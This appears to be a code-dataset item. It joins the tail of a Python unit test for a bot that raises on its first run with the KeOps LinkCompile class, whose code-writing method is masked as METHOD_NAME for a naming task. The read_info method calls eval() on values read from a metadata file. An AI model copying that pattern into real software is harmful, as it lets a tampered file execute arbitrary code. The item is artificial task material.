This test is based on an issue where the exception-raising message was not cleared from the internal message store of the Bot/Pipeline instance and thus re-used on the second run.
"""
raises_on_first_run = RaisesOnFirstRunExpertBot('raises', settings=BotLibSettings)
with raises(ValueError):
raises_on_first_run.process_message(EXAMPLE_DATA_URL)
queues = raises_on_first_run.process_message(EXAMPLE_IP_INPUT)
assert len(queues['output']) == 1
assertMessageEqual(queues['output'][0], EXAMPLE_IP_INPUT)
if __name__ == '__main__': # pragma: no cover
unittest.main() | null |
write code | import os
import keopscore.config.config
from keopscore.config.config import get_build_folder
from keopscore.utils.code_gen_utils import get_hash_name
from keopscore.utils.misc_utils import KeOps_Error, KeOps_Message
from keopscore.config.config import cpp_flags
class LinkCompile:
"""
Base class for compiling the map_reduce schemes and providing the dll to KeOps bindings.
"""
def __init__(self):
# N.B. Here self is assumed to be populated by the __init__ of one of the MapReduce classes
# we create the hash string id corresponding to all parameters, e.g. 7b9a611f7e
self.gencode_filename = get_hash_name(
type(self),
self.red_formula_string,
self.aliases,
self.nargs,
self.dtype,
self.dtypeacc,
self.sum_scheme_string,
self.tagHostDevice,
self.tagCpuGpu,
self.tag1D2D,
self.use_half,
self.device_id,
cpp_flags,
)
# info_file is the name of the file that will contain some meta-information required by the bindings, e.g. 7b9a611f7e.nfo
self.info_file = os.path.join(
get_build_folder(), self.gencode_filename + ".nfo"
)
# gencode_file is the name of the source file to be created and then compiled, e.g. 7b9a611f7e.cpp or 7b9a611f7e.cu
self.gencode_file = os.path.join(
get_build_folder(),
self.gencode_filename + "." + self.source_code_extension,
)
def save_info(self):
# create info_file to save some parameters: dim (dimension of output vectors),
# tagI (0 or 1, reduction over i or j indices),
# dimy (sum of dimensions of j-indexed vectors)
f = open(self.info_file, "w")
f.write(
f"red_formula={self.red_formula_string}\ndim={self.dim}\ntagI={self.tagI}\ndimy={self.dimy}"
)
f.close()
def read_info(self):
# read info_file to retrieve dim, tagI, dimy
f = open(self.info_file, "r")
string = f.read()
f.close()
tmp = string.split("\n")
if len(tmp) != 4:
KeOps_Error("Incorrect info file")
tmp_dim, tmp_tag, tmp_dimy = (
tmp[1].split("="),
tmp[2].split("="),
tmp[3].split("="),
)
if (
len(tmp_dim) != 2
or tmp_dim[0] != "dim"
or len(tmp_tag) != 2
or tmp_tag[0] != "tagI"
or len(tmp_dimy) != 2
or tmp_dimy[0] != "dimy"
):
KeOps_Error("Incorrect info file")
self.dim = eval(tmp_dim[1])
self.tagI = eval(tmp_tag[1])
self.dimy = eval(tmp_dimy[1])
def METHOD_NAME(self):
# write the generated code in the source file; this is used as a subfunction of compile_code
f = open(self.gencode_file, "w")
f.write(self.code)
f.close()
def generate_code(self):
pass
def get_dll_and_params(self):
# main method of the class : it generates - if needed - the code and returns the name of the dll to be run for
# performing the reduction, e.g. 7b9a611f7e.so, or in the case of JIT compilation, the name of the main KeOps dll,
# and the name of the assembly code file.
if not os.path.exists(self.file_to_check):
KeOps_Message(
"Generating code for formula " + self.red_formula.__str__() + " ... ",
flush=True,
end="",
)
self.generate_code()
self.save_info()
KeOps_Message("OK", use_tag=False, flush=True)
else:
self.read_info()
return dict(
tag=self.gencode_filename,
source_file=self.true_dllname,
low_level_code_file=self.low_level_code_file,
tagI=self.tagI,
use_half=self.use_half,
tag1D2D=self.tag1D2D,
dimred=self.red_formula.dimred,
dim=self.dim,
dimy=self.dimy,
indsi=self.varloader.indsi,
indsj=self.varloader.indsj,
indsp=self.varloader.indsp,
dimsx=self.varloader.dimsx,
dimsy=self.varloader.dimsy,
dimsp=self.varloader.dimsp,
) | null |